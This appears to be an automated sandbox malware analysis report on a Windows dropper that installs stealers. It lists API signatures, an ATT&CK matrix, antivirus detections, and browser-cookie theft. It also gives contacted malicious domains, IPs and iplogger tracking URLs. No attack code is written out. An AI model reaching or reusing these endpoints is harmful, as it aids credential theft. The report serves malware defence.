Source: C:\Users\user\AppData\Local\Temp\RarSFX0\002.exeCode function: GetModuleHandleW,GetProcAddress,EncodePointer,RtlDecodePointer,GetLocaleInfoEx,GetLocaleInfoW,1_2_01270E2E
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\002.exeCode function: _wcscmp,_wcscmp,GetLocaleInfoW,GetLocaleInfoW,GetACP,1_2_100960B8
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\002.exeCode function: LdrInitializeThunk,EnumSystemLocalesW,1_2_10087211
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\002.exeCode function: _memset,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_GetLcidFromCountry,GetUserDefaultLCID,IsValidCodePage,LdrInitializeThunk,IsValidLocale,___crtDownlevelLCIDToLocaleName,___crtDownlevelLCIDToLocaleName,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,__itow_s,1_2_10096239
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\002.exeCode function: GetLocaleInfoW,1_2_1008724E
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\002.exeCode function: _TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_GetLocaleNameFromDefault,IsValidCodePage,LdrInitializeThunk,_wcschr,_wcschr,__itow_s,__invoke_watson,_LcidFromHexString,GetLocaleInfoW,1_2_100959E5
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\002.exeCode function: LdrInitializeThunk,EnumSystemLocalesW,1_2_10095C59
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\002.exeCode function: _GetPrimaryLen,LdrInitializeThunk,EnumSystemLocalesW,1_2_10095C99
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\002.exeCode function: _GetPrimaryLen,LdrInitializeThunk,EnumSystemLocalesW,1_2_10095D16
Source: C:\Users\user\AppData\Local\Temp\sib309A.tmp\0\setup.exeCode function: GetLocaleInfoW,GetNumberFormatW,17_2_0006A5BC
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exeCode function: GetLocaleInfoA,19_2_10017CF0
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exeCode function: 19_2_10019780 SetupDiGetDeviceRegistryPropertyA,GetLastError,_memset,SetupDiGetDeviceRegistryPropertyA,19_2_10019780
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Setup.exeQueries volume information: C:\Users\user\AppData\Local\Temp\sib309A.tmp\SibClr.dll VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Setup.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.JScript\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.JScript.dll VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\jg2_2qua.exeQueries volume information: C:\Users\user\AppData\Local\Temp\RarSFX0\d VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\jg2_2qua.exeQueries volume information: C:\Users\user\AppData\Local\Temp\RarSFX0\tmp.edb VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\jg2_2qua.exeQueries volume information: C:\Users\user\AppData\Local\Temp\RarSFX0\d VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\jg2_2qua.exeQueries volume information: C:\Users\user\AppData\Local\Temp\RarSFX0\d.jfm VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\jg2_2qua.exeQueries volume information: C:\Users\user\AppData\Local\Temp\RarSFX0\d VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\jg2_2qua.exeQueries volume information: C:\Users\user\AppData\Local\Temp\RarSFX0\d VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\KeJ7Cl7flZ.exeCode function: 0_2_00ED273E GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,GetModuleFileNameW,SetEnvironmentVariableW,GetLocalTime,_swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,CloseHandle,0_2_00ED273E
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\002.exeCode function: 1_2_01290004 __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,LdrInitializeThunk,__malloc_crt,_strlen,LdrInitializeThunk,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,LdrInitializeThunk,1_2_01290004
Source: C:\Users\user\Desktop\KeJ7Cl7flZ.exeCode function: 0_2_00EC2B26 GetVersionExW,0_2_00EC2B26
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Setup.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

Stealing of Sensitive Information:

barindex
Tries to harvest and steal browser information (history, passwords, etc)Show sources
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\jg2_2qua.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Setup.exeCode function: 15_2_6FEA94C0 LoadLibraryW,GetLastError,GetProcAddress,GetLastError,FreeLibrary,CorBindToRuntimeEx,FreeLibrary,FreeLibrary,FreeLibrary,15_2_6FEA94C0
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exeCode function: 19_2_0047AD92 OleInitialize,_wcslen,CreateBindCtx,MkParseDisplayName,CLSIDFromProgID,GetActiveObject,19_2_0047AD92

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid Accounts2Native API1DLL Side-Loading1Exploitation for Privilege Escalation1Disable or Modify Tools21OS Credential Dumping1System Time Discovery12Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumIngress Tool Transfer2Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationSystem Shutdown/Reboot1
Default AccountsCommand and Scripting Interpreter3Application Shimming1DLL Side-Loading1Deobfuscate/Decode Files or Information1Input Capture31File and Directory Discovery4Remote Desktop ProtocolData from Local System1Exfiltration Over BluetoothEncrypted Channel22Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsAt (Linux)Create Account1Application Shimming1Obfuscated Files or Information3Security Account ManagerSystem Information Discovery57SMB/Windows Admin SharesInput Capture31Automated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsAt (Windows)Valid Accounts2Valid Accounts2Install Root Certificate1NTDSQuery Registry2Distributed Component Object ModelClipboard Data2Scheduled TransferApplication Layer Protocol13SIM Card SwapCarrier Billing Fraud
Cloud AccountsCronBootkit1Access Token Manipulation21Software Packing24LSA SecretsSecurity Software Discovery271SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
Replication Through Removable MediaLaunchdRc.commonProcess Injection12Timestomp1Cached Domain CredentialsVirtualization/Sandbox Evasion4VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
External Remote ServicesScheduled TaskStartup ItemsStartup ItemsDLL Side-Loading1DCSyncProcess Discovery4Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobMasquerading2Proc FilesystemApplication Window Discovery1Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Valid Accounts2/etc/passwd and /etc/shadowRemote System Discovery1Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Modify Registry1Network SniffingSystem Network Configuration Discovery1Taint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact
Compromise Software Dependencies and Development ToolsWindows Command ShellCronCronVirtualization/Sandbox Evasion4Input CapturePermission Groups DiscoveryReplication Through Removable MediaRemote Data StagingExfiltration Over Physical MediumMail ProtocolsService Stop
Compromise Software Supply ChainUnix ShellLaunchdLaunchdAccess Token Manipulation21KeyloggingLocal GroupsComponent Object Model and Distributed COMScreen CaptureExfiltration over USBDNSInhibit System Recovery
Compromise Hardware Supply ChainVisual BasicScheduled TaskScheduled TaskProcess Injection12GUI Input CaptureDomain GroupsExploitation of Remote ServicesEmail CollectionCommonly Used PortProxyDefacement
Trusted RelationshipPythonHypervisorProcess InjectionBootkit1Web Portal CaptureCloud GroupsAttack PC via USB ConnectionLocal Email CollectionStandard Application Layer ProtocolInternal ProxyInternal Defacement

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 324174 Sample: KeJ7Cl7flZ.exe Startdate: 28/11/2020 Architecture: WINDOWS Score: 100 54 www.evograph.ro 2->54 56 jojo-soft.xyz 2->56 58 7 other IPs or domains 2->58 64 Multi AV Scanner detection for domain / URL 2->64 66 Antivirus detection for dropped file 2->66 68 Multi AV Scanner detection for submitted file 2->68 70 10 other signatures 2->70 9 KeJ7Cl7flZ.exe 18 2->9         started        signatures3 process4 file5 34 C:\Users\user\AppData\...\ubisoftpro.exe, PE32 9->34 dropped 36 C:\Users\user\AppData\Local\...\hjjgaa.exe, PE32 9->36 dropped 38 C:\Users\user\AppData\Local\...\file1.exe, PE32 9->38 dropped 40 6 other malicious files 9->40 dropped 12 jg2_2qua.exe 7 9->12         started        17 Setup.exe 1 26 9->17         started        19 002.exe 2 4 9->19         started        process6 dnsIp7 60 101.36.107.74, 49732, 80 UHGL-AS-APUCloudHKHoldingsGroupLimitedHK China 12->60 62 iplogger.org 88.99.66.31, 443, 49733, 49737 HETZNER-ASDE Germany 12->62 42 C:\Users\user\Documents\...\jg2_2qua.exe, MS-DOS 12->42 dropped 74 Antivirus detection for dropped file 12->74 76 Detected unpacking (changes PE section rights) 12->76 78 Drops PE files to the document folder of the user 12->78 80 Tries to harvest and steal browser information (history, passwords, etc) 12->80 44 C:\Users\user\AppData\Local\...\setup.exe, PE32 17->44 dropped 46 C:\Users\user\AppData\Local\...\SibClr.dll, PE32 17->46 dropped 48 C:\Users\user\AppData\Local\...\Sibuia.dll, PE32 17->48 dropped 50 C:\ProgramData\sib\...\SibClr.dll, PE32 17->50 dropped 82 Machine Learning detection for dropped file 17->82 21 setup.exe 5 17->21         started        25 WerFault.exe 23 9 19->25         started        27 WerFault.exe 2 9 19->27         started        file8 signatures9 process10 file11 32 C:\Program Files (x86)\...\aliens.exe, PE32 21->32 dropped 72 Antivirus detection for dropped file 21->72 29 aliens.exe 1 21->29         started        signatures12 process13 file14 52 C:\Users\user\...\85F91A36E275562F.exe, PE32 29->52 dropped

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
KeJ7Cl7flZ.exe67%VirustotalBrowse
KeJ7Cl7flZ.exe79%ReversingLabsWin32.Downloader.Upatre
KeJ7Cl7flZ.exe100%Joe Sandbox ML

Dropped Files

SourceDetectionScannerLabelLink
C:\Users\user\AppData\Local\Temp\RarSFX0\Setup.exe100%AviraHEUR/AGEN.1139239
C:\Users\user\AppData\Local\Temp\sib309A.tmp\0\setup.exe100%AviraTR/Siggen.lhhpy
C:\Users\user\AppData\Local\Temp\RarSFX0\jg2_2qua.exe100%AviraTR/Crypt.CFI.Gen
C:\Users\user\Documents\VlcpVideoV1.0.1\jg2_2qua.exe100%AviraTR/Crypt.CFI.Gen
C:\Users\user\AppData\Local\Temp\RarSFX0\hjjgaa.exe100%AviraHEUR/AGEN.1134829
C:\Users\user\AppData\Local\Temp\RarSFX0\002.exe100%AviraTR/AD.PredatorThief.gldkk
C:\Users\user\AppData\Local\Temp\RarSFX0\file1.exe100%AviraTR/AD.JamkeeDldr.gwmgy
C:\Users\user\AppData\Local\Temp\RarSFX0\ubisoftpro.exe100%AviraTR/AD.ColtyStealer.mwfxd
C:\Users\user\AppData\Local\Temp\RarSFX0\askinstall21.exe100%AviraHEUR/AGEN.1138531
C:\Users\user\AppData\Local\Temp\RarSFX0\BTRSetp.exe100%AviraTR/Kryptik.ijozo
C:\Users\user\AppData\Local\Temp\85F91A36E275562F.exe100%Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\RarSFX0\Setup.exe100%Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\RarSFX0\jg2_2qua.exe100%Joe Sandbox ML
C:\Users\user\Documents\VlcpVideoV1.0.1\jg2_2qua.exe100%Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\RarSFX0\hjjgaa.exe100%Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\RarSFX0\002.exe100%Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\RarSFX0\file1.exe100%Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\RarSFX0\ubisoftpro.exe100%Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\RarSFX0\askinstall21.exe100%Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\RarSFX0\SSSS.exe100%Joe Sandbox ML
C:\Program Files (x86)\ujvqkl7ofji6\aliens.exe100%Joe Sandbox ML
C:\ProgramData\sib\{F9266136-0000-46F8-BC66-FDD9185E4296}\SibClr.dll0%ReversingLabs

Unpacked PE Files

SourceDetectionScannerLabelLinkDownload
15.2.Setup.exe.400000.0.unpack100%AviraHEUR/AGEN.1139321Download File
19.2.aliens.exe.2f00000.4.unpack100%AviraTR/Patched.Ren.GenDownload File
26.0.jg2_2qua.exe.400000.0.unpack100%AviraTR/Crypt.CFI.GenDownload File
15.0.Setup.exe.400000.0.unpack100%AviraHEUR/AGEN.1139321Download File
1.2.002.exe.10000000.3.unpack100%AviraTR/Crypt.XPACK.GenDownload File

Domains

SourceDetectionScannerLabelLink
jojo-soft.xyz9%VirustotalBrowse
evograph.ro7%VirustotalBrowse
trueaerned.com1%VirustotalBrowse
7553014bd6a4211b.xyz5%VirustotalBrowse

URLs

SourceDetectionScannerLabelLink
http://101.36.107.74/seemorebty/il.php?e=jg2_2qua0%Avira URL Cloudsafe
http://ocsp.sectigo.com00%URL Reputationsafe
http://ocsp.sectigo.com00%URL Reputationsafe
http://ocsp.sectigo.com00%URL Reputationsafe
http://www.ipcode.pw/0%Avira URL Cloudsafe
http://crl.sectigo.com/COMODOTimeStampingCA_2.crl0r0%Avira URL Cloudsafe
http://ffdownload.online/business/receiveConnection:0%Avira URL Cloudsafe
http://103.91.21Facebook0%Avira URL Cloudsafe
https://deff.nelreports.net/api/report?cat=msn0%Avira URL Cloudsafe
https://apreltech.com/SilentInstallBuilder/Doc/&t=event&ec=%s&ea=%s&el=_0%Avira URL Cloudsafe
http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#0%URL Reputationsafe
http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#0%URL Reputationsafe
http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#0%URL Reputationsafe
https://www.airbnb.cn/account-settingstext/html0%Avira URL Cloudsafe
http://www.ipcode.pw/0.0.0.0CNpathSOFTWARE0%Avira URL Cloudsafe
http://crl.como0%Avira URL Cloudsafe
https://sectigo.com/CPS0B0%Avira URL Cloudsafe
http://7553014BD6A4211B.xyz/info/w0%Avira URL Cloudsafe
http://crt.sectigo.com/SectigoRSADomainValidationSec0%Avira URL Cloudsafe
https://sectigo.com/CPS0D0%URL Reputationsafe
https://sectigo.com/CPS0D0%URL Reputationsafe
https://sectigo.com/CPS0D0%URL Reputationsafe
http://7553014BD6A4211B.xyz/ng0%Avira URL Cloudsafe
http://7553014BD6A4211B.xyz/0%Avira URL Cloudsafe
http://101.36.107.74/seemorebty/0%Avira URL Cloudsafe
http://crt.sectigo.com/COMODOTimeStampingCA_2.crt0#0%Avira URL Cloudsafe
http://ocsp.pki.goog/GTSGIAG300%Avira URL Cloudsafe
http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#0%URL Reputationsafe
http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#0%URL Reputationsafe
http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#0%URL Reputationsafe
https://sectigo.com/CPS00%URL Reputationsafe
https://sectigo.com/CPS00%URL Reputationsafe
https://sectigo.com/CPS00%URL Reputationsafe
http://crl.pki.goog/GTSGIAG3.crl00%Avira URL Cloudsafe
http://ocsp.thawte.com00%URL Reputationsafe
http://ocsp.thawte.com00%URL Reputationsafe
http://ocsp.thawte.com00%URL Reputationsafe
http://101.36.10https://www.instH0%Avira URL Cloudsafe
http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s0%URL Reputationsafe
http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s0%URL Reputationsafe
http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s0%URL Reputationsafe
http://crl.comoZ0%Avira URL Cloudsafe
http://ffdownload.online/business/receive0%Avira URL Cloudsafe
http://ocsp.pki.goog/gsr2020%URL Reputationsafe
http://ocsp.pki.goog/gsr2020%URL Reputationsafe
http://ocsp.pki.goog/gsr2020%URL Reputationsafe
https://pki.goog/repository/00%URL Reputationsafe
https://pki.goog/repository/00%URL Reputationsafe
https://pki.goog/repository/00%URL Reputationsafe
http://crl.comoU0%Avira URL Cloudsafe
https://adservice.google.co.uk/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=5864849777998;gt0%Avira URL Cloudsafe
http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t0%URL Reputationsafe
http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t0%URL Reputationsafe
http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t0%URL Reputationsafe
https://www.airbnb.cn/account-settings0%Avira URL Cloudsafe
http://7553014BD6A4211B.xyz/L0%Avira URL Cloudsafe
http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#0%URL Reputationsafe
http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#0%URL Reputationsafe
http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#0%URL Reputationsafe
http://7553014bd6a4211b.xyz/00%Avira URL Cloudsafe
http://cookies.onetrust.mgr.consensu.org/onetrust-logo.svg0%Avira URL Cloudsafe
http://crt.sectigo.com/SectigoRSADomainValidationSec)0%Avira URL Cloudsafe
http://www.zxfc.pw/Home/Index/sksxz?uid=3a1c3033bf5a5764882caec7a4cf3849e7de2ef2a8d79cece23467f1d8870%Avira URL Cloudsafe
http://www.fddnice.pw/0%Avira URL Cloudsafe
http://crl.pki.goog/gsr2/gsr2.crl0?0%URL Reputationsafe
http://crl.pki.goog/gsr2/gsr2.crl0?0%URL Reputationsafe
http://crl.pki.goog/gsr2/gsr2.crl0?0%URL Reputationsafe
http://Ojyehq4jg.2ihsfa.com/0%Avira URL Cloudsafe
http://pki.goog/gsr2/GTSGIAG3.crt0)0%Avira URL Cloudsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
jojo-soft.xyz
104.31.72.130
truetrueunknown
iplogger.org
88.99.66.31
truefalse
    		high
    ip-api.com
    		208.95.112.1
    		truefalse
      		high
      evograph.ro
      		89.40.17.17
      		truefalseunknown
      trueaerned.com
      		198.98.57.54
      		truefalseunknown
      7553014bd6a4211b.xyz
      		172.67.157.133
      		truefalseunknown
      p421ls.xyz
      		104.31.90.245
      		truefalse
        		unknown
        g.msn.com
        		unknown
        		unknownfalse
          		high
          www.evograph.ro
          		unknown
          		unknowntrue
            		unknown

            Contacted URLs

            NameMaliciousAntivirus DetectionReputation
            http://101.36.107.74/seemorebty/il.php?e=jg2_2quafalse
            • Avira URL Cloud: safe
            		unknown

            URLs from Memory and Binaries

            NameSourceMaliciousAntivirus DetectionReputation
            http://www.msn.com/de-ch/entertainment/_h/c920645c/webcore/externalscripts/oneTrustV2/scripttemplatejg2_2qua.exe, 0000001A.00000003.489902919.0000000003E08000.00000004.00000001.sdmpfalse
              		high
              https://iplogger.org/1KyTy7askinstall21.exefalse
                		high
                http://ocsp.sectigo.com0Setup.exe, 0000000F.00000002.467933755.0000000000420000.00000004.00020000.sdmp, jg2_2qua.exe, 0000001A.00000002.506529883.000000000071B000.00000004.00000020.sdmp, SibClr.dll.15.drfalse
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                		unknown
                https://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=58648497779jg2_2qua.exe, 0000001A.00000003.492557880.0000000003E20000.00000004.00000001.sdmpfalse
                  		high
                  http://www.ipcode.pw/askinstall21.exefalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://crl.sectigo.com/COMODOTimeStampingCA_2.crl0rhjjgaa.exefalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://ffdownload.online/business/receiveConnection:002.exefalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://103.91.21Facebookubisoftpro.exefalse
                  • Avira URL Cloud: safe
                  		low
                  https://deff.nelreports.net/api/report?cat=msnjg2_2qua.exe, 0000001A.00000003.489902919.0000000003E08000.00000004.00000001.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://apreltech.com/SilentInstallBuilder/Doc/&t=event&ec=%s&ea=%s&el=_Setup.exe, 0000000F.00000002.476631772.000000006FF05000.00000002.00020000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://iplogger.org/1XJq97askinstall21.exefalse
                    		high
                    http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#Setup.exe, 0000000F.00000002.467933755.0000000000420000.00000004.00020000.sdmp, SibClr.dll.15.drfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    		unknown
                    https://www.airbnb.cn/account-settingstext/htmlubisoftpro.exefalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.ipcode.pw/0.0.0.0CNpathSOFTWAREaskinstall21.exefalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://iplogger.org/1T79i7askinstall21.exefalse
                      		high
                      http://crl.comojg2_2qua.exe, 0000001A.00000003.481303695.0000000000726000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://iplogger.org/1Uts87askinstall21.exefalse
                        		high
                        https://login.microsoftonline.com/common/oauth2/authorize?client_id=9ea1ad79-fdb6-4f9a-8bc3-2b70f96ejg2_2qua.exe, 0000001A.00000003.492557880.0000000003E20000.00000004.00000001.sdmpfalse
                          		high
                          https://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=3931852jg2_2qua.exe, 0000001A.00000003.492557880.0000000003E20000.00000004.00000001.sdmpfalse
                            		high
                            http://charlesproxy.com/sslaliens.exe, 00000013.00000002.508576720.0000000000BB7000.00000004.00000020.sdmp, aliens.exe, 00000013.00000002.508666439.0000000000BCF000.00000004.00000020.sdmpfalse
                              		high
                              http://crl.thawte.com/ThawteTimestampingCA.crl085F91A36E275562F.exe.19.drfalse
                                		high
                                https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2jg2_2qua.exe, 0000001A.00000003.492557880.0000000003E20000.00000004.00000001.sdmpfalse
                                  		high
                                  https://iplogger.org/1OhAGaskinstall21.exefalse
                                    		high
                                    https://iplogger.org/1uVkt7askinstall21.exefalse
                                      		high
                                      https://sectigo.com/CPS0Bhjjgaa.exefalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.msn.com/?ocid=iehpjg2_2qua.exe, 0000001A.00000003.492557880.0000000003E20000.00000004.00000001.sdmpfalse
                                        		high
                                        https://iplogger.org/1b4887askinstall21.exefalse
                                          		high
                                          http://7553014BD6A4211B.xyz/info/waliens.exe, 00000013.00000002.508492865.0000000000B96000.00000004.00000020.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://crt.sectigo.com/SectigoRSADomainValidationSecjg2_2qua.exe, 0000001A.00000002.506529883.000000000071B000.00000004.00000020.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://iplogger.org/1OZVHaskinstall21.exefalse
                                            		high
                                            https://sectigo.com/CPS0DSetup.exe, 0000000F.00000002.467933755.0000000000420000.00000004.00020000.sdmp, SibClr.dll.15.drfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            		unknown
                                            https://iplogger.org/1UpU57askinstall21.exefalse
                                              		high
                                              http://7553014BD6A4211B.xyz/ngaliens.exe, 00000013.00000002.508446733.0000000000B6A000.00000004.00000020.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://iplogger.org/1O2BHaskinstall21.exefalse
                                                		high
                                                https://iplogger.org/1XKq97askinstall21.exefalse
                                                  		high
                                                  https://iplogger.org/1TT4a7John_Ship.urlfalse
                                                    		high
                                                    https://iplogger.org/1XSq97askinstall21.exefalse
                                                      		high
                                                      http://7553014BD6A4211B.xyz/aliens.exe, 00000013.00000002.508446733.0000000000B6A000.00000004.00000020.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://101.36.107.74/seemorebty/jg2_2qua.exe, 0000001A.00000002.504458828.00000000004F4000.00000040.00020000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://crt.sectigo.com/COMODOTimeStampingCA_2.crt0#hjjgaa.exefalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://ocsp.pki.goog/GTSGIAG30jg2_2qua.exe, 0000001A.00000003.495023797.0000000003E31000.00000004.00000001.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      https://charlesproxy.com/ssl1aliens.exe, 00000013.00000002.508576720.0000000000BB7000.00000004.00000020.sdmpfalse
                                                        		high
                                                        https://iplogger.org/19iM77askinstall21.exefalse
                                                          		high
                                                          http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#jg2_2qua.exe, 0000001A.00000002.506529883.000000000071B000.00000004.00000020.sdmpfalse
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          		unknown
                                                          https://iplogger.org/1T89i7askinstall21.exefalse
                                                            		high
                                                            https://iplogger.org/16ajh7askinstall21.exefalse
                                                              		high
                                                              https://iplogger.org/2WS9q6ubisoftplushttps://iplogger.org/2WF9q6ubisoftsmphttps://iplogger.org/2WJ9ubisoftpro.exefalse
                                                                		high
                                                                https://sectigo.com/CPS0Setup.exe, 0000000F.00000002.467933755.0000000000420000.00000004.00020000.sdmp, jg2_2qua.exe, 0000001A.00000002.506529883.000000000071B000.00000004.00000020.sdmp, SibClr.dll.15.drfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                		unknown
                                                                http://ip-api.com/json/countryCodecountry_codemac%s.exeSoftwarehjjgaa.exefalse
                                                                  		high
                                                                  http://crl.pki.goog/GTSGIAG3.crl0jg2_2qua.exe, 0000001A.00000003.495023797.0000000003E31000.00000004.00000001.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  https://iplogger.org/16xjh7askinstall21.exefalse
                                                                    		high
                                                                    http://ocsp.thawte.com085F91A36E275562F.exe.19.drfalse
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    		unknown
                                                                    https://optanon.blob.core.windows.net/skins/4.1.0/default_flat_top_two_button_black/v2/css/optanon.cjg2_2qua.exe, 0000001A.00000003.493765388.0000000003F30000.00000004.00000001.sdmpfalse
                                                                      		high
                                                                      https://iplogger.org/1X8M97askinstall21.exefalse
                                                                        		high
                                                                        https://iplogger.org/2WX9q6ubisoftmorehttps://iplogger.org/2WN9q6ubisoftablehttps://iplogger.org/2W6ubisoftpro.exefalse
                                                                          		high
                                                                          https://iplogger.org/ZdnY7jg2_2qua.exe, 0000001A.00000003.480992334.000000000071B000.00000004.00000001.sdmp, jg2_2qua.exe, 0000001A.00000003.480069462.0000000000724000.00000004.00000001.sdmpfalse
                                                                            		high
                                                                            http://101.36.10https://www.instHjg2_2qua.exe, 0000001A.00000002.503990767.0000000000401000.00000040.00020000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            		low
                                                                            https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1jg2_2qua.exe, 0000001A.00000003.492557880.0000000003E20000.00000004.00000001.sdmpfalse
                                                                              		high
                                                                              http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0sSetup.exe, 0000000F.00000002.467933755.0000000000420000.00000004.00020000.sdmp, SibClr.dll.15.drfalse
                                                                              • URL Reputation: safe
